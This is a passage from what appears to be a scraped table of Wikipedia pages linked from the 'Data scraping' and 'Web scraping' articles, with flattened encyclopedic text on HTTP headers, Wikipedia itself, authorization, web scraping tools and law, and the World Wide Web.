will usually fetch a index.html file if there is one.) The ETag (entity tag) header field is used to determine if a cached version of the requested resource is identical to the current version of the resource on the server. "Content-Type" specifies the Internet media type of the data conveyed by the HTTP message, while "Content-Length" indicates its length in bytes. The HTTP 1.1 webserver publishes its ability to respond to requests for certain byte ranges of the document by setting the field "Accept-Ranges: bytes". This is useful, if the client needs to have only certain portions 62 of a resource sent by the server, which is called byte serving. When "Connection: close" is sent, it means that the web server will close the TCP connection immediately after the end of the transfer of this response. 22 Most of the header lines are optional but some are mandatory. When header "Content-Length: number" is missing in a response with an entity body then this should be considered an error in HTTP 1.0 but it may not be an error in HTTP 1.1 if header "Transfer-Encoding: chunked" is present. Chunked transfer encoding uses a chunk size of 0 to mark the end of the content. Some old implementations of HTTP 1.0 omitted the header "Content-Length" when the length of the body entity was not known at the beginning of the response and so the transfer of data to client continued until server closed the socket. A "Content-Encoding: gzip" can be used to inform the client that the body entity part of the transmitted data is compressed by gzip algorithm. The most popular way of establishing an encrypted HTTP connection is HTTPS. 63 Two other methods for establishing an encrypted HTTP connection also exist: Secure Hypertext Transfer Protocol, and using the HTTP 1.1 Upgrade header to specify an upgrade to TLS. Browser support for these two is, however, nearly non-existent. 64 65 66 |
694 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Wikipedia:About | Wikipedia is a free online encyclopedia that anyone can edit, and millions already have. Wikipedia's purpose is to benefit readers by presenting information on all branches of knowledge. Hosted by the Wikimedia Foundation, it consists of freely editable content, whose articles also have numerous links to guide readers towards more information. Written collaboratively by largely anonymous volunteers known as Wikipedians, Wikipedia articles can be edited by anyone with Internet access, except in limited cases where editing is restricted to prevent disruption or vandalism. Since its creation on January 15, 2001, it has grown into the world's largest reference website, attracting over a billion visitors monthly. Wikipedia currently has more than sixty-three million articles in more than 300 languages, including 6,868,487 articles in English, with 113,813 active contributors in the past month. Wikipedia's fundamental principles are summarized in its five pillars. The Wikipedia community has developed many policies and guidelines, although editors do not need to be familiar with them before contributing. Anyone can edit Wikipedia's text, references, and images. What is written is more important than who writes it. The content must conform with Wikipedia's policies, including being verifiable by published sources. Editors' opinions, beliefs, personal experiences, unreviewed research, libelous material, and copyright violations will not remain. Wikipedia's software allows easy reversal of errors, and experienced editors watch and patrol bad edits. Wikipedia differs from printed references in important ways. It is continually created and updated, and encyclopedic articles on new events appear within minutes rather than months or years. Because anyone can improve Wikipedia, it has become more comprehensive than any other encyclopedia. Its contributors enhance its articles' quality and quantity, and remove misinformation, errors and vandalism. Any reader can fix a mistake or add more information to what has already been written (see Researching with Wikipedia). Begin by simply clicking the Edit or Edit source buttons or the pencil icon at the top of any non-protected page or section. Wikipedia has tested the wisdom of the crowd since 2001 and found that it succeeds. |
695 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Authorization | Authorization or authorisation (see spelling differences) is the function of specifying access rights privileges to resources, which is related to general information security and computer security, and to access control in particular. 1 More formally, "to authorize" is to define an access policy. For example, human resources staff are normally authorized to access employee records and this policy is often formalized as access control rules in a computer system. During operation, the system uses the access control rules to decide whether access requests from (authenticated) consumers shall be approved (granted) or disapproved (rejected). 2 Resources include individual files or an item's data, computer programs, computer devices and functionality provided by computer applications. Examples of consumers are computer users, computer software and other hardware on the computer. Access control in computer systems and networks rely on access policies. The access control process can be divided into the following phases: policy definition phase where access is authorized, and policy enforcement phase where access requests are approved or disapproved. Authorization is the function of the policy definition phase which precedes the policy enforcement phase where access requests are approved or disapproved based on the previously defined authorizations. Most modern, multi-user operating systems include role-based access control (RBAC) and thereby rely on authorization. Access control also uses authentication to verify the identity of consumers. When a consumer tries to access a resource, the access control process checks that the consumer has been authorized to use that resource. Authorization is the responsibility of an authority, such as a department manager, within the application domain, but is often delegated to a custodian such as a system administrator. Authorizations are expressed as access policies in some types of "policy definition application", e.g. in the form of an access control list or a capability, or a policy administration point e.g. XACML. On the basis of the "principle of least privilege": consumers should only be authorized to access whatever they need to do their jobs. Older and single user operating systems often had weak or non-existent authentication and access control systems. "Anonymous consumers" or "guests", are consumers that have not been required to authenticate. They often have limited authorization. On a distributed system, it is often desirable to grant access without requiring a unique identity. Familiar examples of access tokens include keys, certificates and tickets: they grant access without proving identity. Trusted consumers are often authorized for unrestricted access to resources on a system, but must be verified so that the access control system can make the access approval decision. "Partially trusted" and guests will often have restricted authorization in order to protect resources against improper access and usage. The access policy in some operating systems, by default, grant all consumers full access to all resources. Others do the opposite, insisting that the administrator explicitly authorizes a consumer to use each resource. Even when access is controlled through a combination of authentication and access control lists, the problems of maintaining the authorization data is not trivial, and often represents as much administrative burden as managing authentication credentials. It is often necessary to change or remove a user's authorization: this is done by changing or deleting the corresponding access rules on the system. Using atomic authorization is an alternative to per-system authorization management, where a trusted third party securely distributes authorization information. In public policy, authorization is a feature of trusted systems used for security or social control. In banking, an authorization is a hold placed on a customer's account when a purchase is made using a debit card or credit card. In publishing, sometimes public lectures and other freely available texts are published without the approval of the author. These are called unauthorized texts. An example is the 2002 'The Theory of Everything: The Origin and Fate of the Universe' , which was collected from Stephen Hawking's lectures and published without his permission as per copyright law. citation needed |
696 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-22 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
697 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/World_Wide_Web | The World Wide Web (WWW or simply the Web) is an information system that enables content sharing over the Internet through user-friendly ways meant to appeal to users beyond IT specialists and hobbyists. 1 It allows documents and other web resources to be accessed over the Internet according to specific rules of the Hypertext Transfer Protocol (HTTP). 2 The Web was invented by English computer scientist Tim Berners-Lee while at CERN in 1989 and opened to the public in 1991. It was conceived as a "universal linked information system". 3 4 Documents and other media content are made available to the network through web servers and can be accessed by programs such as web browsers. Servers and resources on the World Wide Web are identified and located through character strings called uniform resource locators (URLs). The original and still very common document type is a web page formatted in Hypertext Markup Language (HTML). This markup language supports plain text, images, embedded video and audio contents, and scripts (short programs) that implement complex user interaction. The HTML language also supports hyperlinks (embedded URLs) which provide immediate access to other web resources. Web navigation, or web surfing, is the common practice of following such hyperlinks across multiple websites. Web applications are web pages that function as application software. The information in the Web is transferred across the Internet using HTTP. Multiple web resources with a common theme and usually a common domain name make up a website. A single web server may provide multiple websites, while some websites, especially the most popular ones, may be provided by multiple servers. Website content is provided by a myriad of companies, organizations, government agencies, and individual users; and comprises an enormous amount of educational, entertainment, commercial, and government information. The Web has become the world's dominant information systems platform. 5 6 7 8 It is the primary tool that billions of people worldwide use to interact with the Internet. 2 The Web was invented by English computer scientist Tim Berners-Lee while working at CERN. 9 10 He was motivated by the problem of storing, updating, and finding documents and data files in that large and constantly changing organization, as well as distributing them to collaborators outside CERN. In his design, Berners-Lee dismissed the common tree structure approach, used for instance in the existing CERNDOC documentation system and in the Unix filesystem, as well as approaches that relied in tagging files with keywords, as in the VAX NOTES system. Instead he adopted concepts he had put into practice with his private ENQUIRE system (1980) built at CERN. When he became aware of Ted Nelson's hypertext model (1965), in which documents can be linked in unconstrained ways through hyperlinks associated with "hot spots" embedded in the text, it helped to confirm the validity of his concept. 11 12 The model was later popularized by Apple's HyperCard system. Unlike Hypercard, Berners-Lee's new system from the outset was meant to support links between multiple databases on independent computers, and to allow simultaneous access by many users from any computer on the Internet. He also specified that the system should eventually handle other media besides text, such as graphics, speech, and video. Links could refer to mutable data files, or even fire up programs on their server computer. He also conceived "gateways" that would allow access through the new system to documents organized in other ways (such as traditional computer file systems or the Usenet). Finally, he insisted that the system should be decentralized, without any central control or coordination over the creation of links. 3 13 9 10 Berners-Lee submitted a proposal to CERN in May 1989, without giving the system a name. 3 He got a working system implemented by the end of 1990, including a browser called WorldWideWeb (which became the name of the project and of the network) and an HTTP server running at CERN. As part of that development he defined the first version of the HTTP protocol, the basic URL syntax, and implicitly made HTML the primary document format. 14 The technology was released outside CERN to other research institutions starting in January 1991, and then to the whole Internet on 23 August 1991. The Web was a success at CERN, and began to spread to other scientific and academic institutions. Within the next two years, there were 50 websites created. 15 16 CERN made the Web protocol and code available royalty free in 1993, enabling its widespread use. 17 18 After the NCSA released the Mosaic web browser later that year, the Web's popularity grew rapidly as thousands of websites sprang up in less than a year. 19 20 Mosaic was a graphical browser that could display inline images and submit forms that were processed by the HTTPd server. 21 22 Marc Andreessen and Jim Clark founded Netscape the following year and released the Navigator browser, which introduced Java and JavaScript to the Web. It quickly became the dominant browser. Netscape became a public company in 1995 which triggered a frenzy for the Web and started the dot-com bubble. 23 Microsoft responded by developing its own browser, Internet Explorer, starting the browser wars. By bundling it with Windows, it became the dominant browser for 14 years. 24 Berners-Lee founded the World Wide Web Consortium (W3C) which created XML in 1996 and recommended replacing HTML with stricter XHTML. 25 In the meantime, developers began exploiting an IE feature called XMLHttpRequest to make Ajax applications and launched the Web 2.0 revolution. Mozilla, Opera, and Apple rejected XHTML and created the WHATWG which developed HTML5. 26 In 2009, the W3C conceded and abandoned XHTML. 27 In 2019, it ceded control of the HTML specification to the WHATWG. 28 The World Wide Web has been central to the development of the Information Age and is the primary tool billions of people use to interact on the Internet. 29 30 31 8 Tim Berners-Lee states that World Wide Web is officially spelled as three separate words, each capitalised, with no intervening hyphens. 32 Nonetheless, it is often called simply the Web, and also often the web; see Capitalization of Internet for details. In Mandarin Chinese, World Wide Web is commonly translated via a phono-semantic matching to w n w i w ng ( ), which satisfies www and literally means "10,000 dimensional net", a translation that reflects the design concept and proliferation of the World Wide Web. Use of the www prefix has been declining, especially when web applications sought to brand their domain names and make them easily pronounceable. As the mobile Web grew in popularity, citation needed services like Gmail.com, Outlook.com, Myspace.com, Facebook.com and Twitter.com are most often mentioned without adding "www. (or, indeed, .com") to the domain. 33 In English, www is usually read as double-u double-u double-u. 34 Some users pronounce it dub-dub-dub, particularly in New Zealand. 35 Stephen Fry, in his "Podgrams" series of podcasts, pronounces it wuh wuh wuh. 36 The English writer Douglas Adams once quipped in The Independent on Sunday (1999): "The World Wide Web is the only thing I know of whose shortened form takes three times longer to say than what it's short for". 37 The terms Internet and World Wide Web are often used without much distinction. However, the two terms do not mean the same thing. The Internet is a global system of computer networks interconnected through telecommunications and optical networking. In contrast, the World Wide Web is a global collection of documents and other resources, linked by hyperlinks and URIs. Web resources are accessed using HTTP or HTTPS, which are application-level Internet protocols that use the Internet's transport protocols. 2 Viewing a web page on the World Wide Web normally begins either by typing the URL of the page into a web browser or by following a hyperlink to that page or resource. The web browser then initiates a series of background communication messages to fetch and display the requested page. In the 1990s, using a browser to view web pages—and to move from one web page to another through hyperlinks—came to be known as 'browsing, 'web surfing' (after channel surfing), or 'navigating the Web'. Early studies of this new behaviour investigated user patterns in using web browsers. One study, for example, found five user patterns: exploratory surfing, window surfing, evolved surfing, bounded navigation and targeted navigation. 38 The following example demonstrates the functioning of a web browser when accessing a page at the URL http: example.org home.html. The browser resolves the server name of the URL (example.org) into an Internet Protocol address using the globally distributed Domain Name System (DNS). This lookup returns an IP address such as 203.0.113.4 or 2001:db8:2e::7334. The browser then requests the resource by sending an HTTP request across the Internet to the computer at that address. It requests service from a specific TCP port number that is well known for the HTTP service so that the receiving host can distinguish an HTTP request from other network protocols it may be servicing. HTTP normally uses port number 80 and for HTTPS it normally uses port number 443. The content of the HTTP request can be as simple as two lines of text: The computer receiving the HTTP request delivers it to web server software listening for requests on port 80. If the webserver can fulfil the request it sends an HTTP response back to the browser indicating success: followed by the content of the requested page. Hypertext Markup Language (HTML) for a basic web page might look like this: The web browser parses the HTML and interprets the markup ( title , p for paragraph, and such) that surrounds the words to format the text on the screen. Many web pages use HTML to reference the URLs of other resources such as images, other embedded media, scripts that affect page behaviour, and Cascading Style Sheets that affect page layout. The browser makes additional HTTP requests to the web server for these other Internet media types. As it receives their content from the web server, the browser progressively renders the page onto the screen as specified by its HTML and these additional resources. Hypertext Markup Language (HTML) is the standard markup language for creating web pages and web applications. With Cascading Style Sheets (CSS) and JavaScript, it forms a triad of cornerstone technologies for the World Wide Web. 39 Web browsers receive HTML documents from a web server or from local storage and render the documents into multimedia web pages. HTML describes the structure of a web page semantically and originally included cues for the appearance of the document. HTML elements are the building blocks of HTML pages. With HTML constructs, images and other objects such as interactive forms may be embedded into the rendered page. HTML provides a means to create structured documents by denoting structural semantics for text such as headings, paragraphs, lists, links, quotes and other items. HTML elements are delineated by tags, written using angle brackets. Tags such as img and input directly introduce content into the page. Other tags such as p surround and provide information about document text and may include other tags as sub-elements. Browsers do not display the HTML tags, but use them to interpret the content of the page. HTML can embed programs written in a scripting language such as JavaScript, which affects the behaviour and content of web pages. Inclusion of CSS defines the look and layout of content. The World Wide Web Consortium (W3C), maintainer of both the HTML and the CSS standards, has encouraged the use of CSS over explicit presentational HTML since 1997. update 40 Most web pages contain hyperlinks to other related pages and perhaps to downloadable files, source documents, definitions and other web resources. In the underlying HTML, a hyperlink looks like this: a href "http: example.org home.html" Example.org Homepage a . Such a collection of useful, related resources, interconnected via hypertext links is dubbed a web of information. Publication on the Internet created what Tim Berners-Lee first called the WorldWideWeb (in its original CamelCase, which was subsequently discarded) in November 1990. 41 The hyperlink structure of the web is described by the webgraph: the nodes of the web graph correspond to the web pages (or URLs) the directed edges between them to the hyperlinks. Over time, many web resources pointed to by hyperlinks disappear, relocate, or are replaced with different content. This makes hyperlinks obsolete, a phenomenon referred to in some circles as link rot, and the hyperlinks affected by it are often called "dead" links. The ephemeral nature of the Web has prompted many efforts to archive websites. The Internet Archive, active since 1996, is the best known of such efforts. Many hostnames used for the World Wide Web begin with www because of the long-standing practice of naming Internet hosts according to the services they provide. The hostname of a web server is often www, in the same way that it may be ftp for an FTP server, and news or nntp for a Usenet news server. These hostnames appear as Domain Name System (DNS) or subdomain names, as in www.example.com. The use of www is not required by any technical or policy standard and many web sites do not use it; the first web server was nxoc01.cern.ch. 42 According to Paolo Palazzi, who worked at CERN along with Tim Berners-Lee, the popular use of www as subdomain was accidental; the World Wide Web project page was intended to be published at www.cern.ch while info.cern.ch was intended to be the CERN home page; however the DNS records were never switched, and the practice of prepending www to an institution's website domain name was subsequently copied. 43 better source needed Many established websites still use the prefix, or they employ other subdomain names such as www2, secure or en for special purposes. Many such web servers are set up so that both the main domain name (e.g., example.com) and the www subdomain (e.g., www.example.com) refer to the same site; others require one form or the other, or they may map to different web sites. The use of a subdomain name is useful for load balancing incoming web traffic by creating a CNAME record that points to a cluster of web servers. Since, currently as of? , only a subdomain can be used in a CNAME, the same result cannot be achieved by using the bare domain root. 44 dubious discuss When a user submits an incomplete domain name to a web browser in its address bar input field, some web browsers automatically try adding the prefix "www" to the beginning of it and possibly .com", .org" and .net" at the end, depending on what might be missing. For example, entering "microsoft" may be transformed to http: www.microsoft.com and "openoffice" to http: www.openoffice.org. This feature started appearing in early versions of Firefox, when it still had the working title 'Firebird' in early 2003, from an earlier practice in browsers such as Lynx. 45 unreliable source? It is reported that Microsoft was granted a US patent for the same idea in 2008, but only for mobile devices. 46 The scheme specifiers http: and https: at the start of a web URI refer to Hypertext Transfer Protocol or HTTP Secure, respectively. They specify the communication protocol to use for the request and response. The HTTP protocol is fundamental to the operation of the World Wide Web, and the added encryption layer in HTTPS is essential when browsers send or retrieve confidential data, such as passwords or banking information. Web browsers usually automatically prepend http: to user-entered URIs, if omitted. A web page (also written as webpage) is a document that is suitable for the World Wide Web and web browsers. A web browser displays a web page on a monitor or mobile device. The term web page usually refers to what is visible, but may also refer to the contents of the computer file itself, which is usually a text file containing hypertext written in HTML or a comparable markup language. Typical web pages provide hypertext for browsing to other web pages via hyperlinks, often referred to as links. Web browsers will frequently have to access multiple web resource elements, such as reading style sheets, scripts, and images, while presenting each web page. On a network, a web browser can retrieve a web page from a remote web server. The web server may restrict access to a private network such as a corporate intranet. The web browser uses the Hypertext Transfer Protocol (HTTP) to make such requests to the web server. A static web page is delivered exactly as stored, as web content in the web server's file system. In contrast, a dynamic web page is generated by a web application, usually driven by server-side software. Dynamic web pages are used when each user may require completely different information, for example, bank websites, web email etc. A static web page (sometimes called a flat page stationary page) is a web page that is delivered to the user exactly as stored, in contrast to dynamic web pages which are generated by a web application. Consequently, a static web page displays the same information for all users, from all contexts, subject to modern capabilities of a web server to negotiate content-type or language of the document where such versions are available and the server is configured to do so. A server-side dynamic web page is a web page whose construction is controlled by an application server processing server-side scripts. In server-side scripting, parameters determine how the assembly of every new web page proceeds, including the setting up of more client-side processing. A client-side dynamic web page processes the web page using JavaScript running in the browser. JavaScript programs can interact with the document via Document Object Model, or DOM, to query page state and alter it. The same client-side techniques can then dynamically update or change the DOM in the same way. A dynamic web page is then reloaded by the user or by a computer program to change some variable content. The updating information could come from the server, or from changes made to that page's DOM. This may or may not truncate the browsing history or create a saved version to go back to, but a dynamic web page update using Ajax technologies will neither create a page to go back to nor truncate the web browsing history forward of the displayed page. Using Ajax technologies the end user gets one dynamic page managed as a single page in the web browser while the actual web content rendered on that page can vary. The Ajax engine sits only on the browser requesting parts of its DOM, the DOM, for its client, from an application server. Dynamic HTML, or DHTML, is the umbrella term for technologies and methods used to create web pages that are not static web pages, though it has fallen out of common use since the popularization of AJAX, a term which is now itself rarely used. citation needed Client-side-scripting, server-side scripting, or a combination of these make for the dynamic web experience in a browser. JavaScript is a scripting language that was initially developed in 1995 by Brendan Eich, then of Netscape, for use within web pages. 47 The standardised version is ECMAScript. 47 To make web pages more interactive, some web applications also use JavaScript techniques such as Ajax (asynchronous JavaScript and XML). Client-side script is delivered with the page that can make additional HTTP requests to the server, either in response to user actions such as mouse movements or clicks, or based on elapsed time. The server's responses are used to modify the current page rather than creating a new page with each response, so the server needs only to provide limited, incremental information. Multiple Ajax requests can be handled at the same time, and users can interact with the page while data is retrieved. Web pages may also regularly poll the server to check whether new information is available. 48 A website 49 is a collection of related web resources including web pages, multimedia content, typically identified with a common domain name, and published on at least one web server. Notable examples are wikipedia.org, google.com, and amazon.com. A website may be accessible via a public Internet Protocol (IP) network, such as the Internet, or a private local area network (LAN), by referencing a uniform resource locator (URL) that identifies the site. Websites can have many functions and can be used in various fashions; a website can be a personal website, a corporate website for a company, a government website, an organization website, etc. Websites are typically dedicated to a particular topic or purpose, ranging from entertainment and social networking to providing news and education. All publicly accessible websites collectively constitute the World Wide Web, while private websites, such as a company's website for its employees, are typically a part of an intranet. Web pages, which are the building blocks of websites, are documents, typically composed in plain text interspersed with formatting instructions of Hypertext Markup Language (HTML, XHTML). They may incorporate elements from other websites with suitable markup anchors. Web pages are accessed and transported with the Hypertext Transfer Protocol (HTTP), which may optionally employ encryption (HTTP Secure, HTTPS) to provide security and privacy for the user. The user's application, often a web browser, renders the page content according to its HTML markup instructions onto a display terminal. Hyperlinking between web pages conveys to the 